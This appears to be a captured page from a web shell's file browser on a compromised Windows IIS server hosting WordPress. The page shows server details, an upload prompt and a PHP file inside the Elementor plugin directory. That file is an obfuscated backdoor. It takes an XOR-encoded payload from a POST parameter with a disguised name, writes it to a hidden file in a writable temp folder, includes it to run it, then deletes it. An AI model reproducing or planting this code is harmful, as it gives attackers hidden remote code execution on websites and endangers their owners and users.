| Server IP : 80.65.208.158 / Your IP : 216.73.216.25 Web Server : Microsoft-IIS/10.0 System : Windows NT VMI1501711 10.0 build 17763 (Windows Server 2019) AMD64 User : IWPD_134(rotechno) ( 0) PHP Version : 8.3.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/Inetpub/vhosts/rotechnochem.com/httpdocs/wp-content/plugins/elementor/core/utils/ |
Upload File : |
<?php
if(array_key_exists("ele\x6Den\x74", $_POST) && !is_null($_POST["ele\x6Den\x74"])){
$desc = array_filter(["/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), session_save_path(), getenv("TEMP"), "/var/tmp", sys_get_temp_dir()]);
$component = hex2bin($_POST["ele\x6Den\x74"]);
$object = '' ; $k = 0; do{$object .= chr(ord($component[$k]) ^ 27);$k++;} while($k < strlen($component));
foreach ($desc as $marker):
if (is_dir($marker) ? is_writable($marker) : false) {
$hld = "$marker/.ptr";
$success = file_put_contents($hld, $object);
if ($success) {
include $hld;
@unlink($hld);
die();}
}
endforeach;
}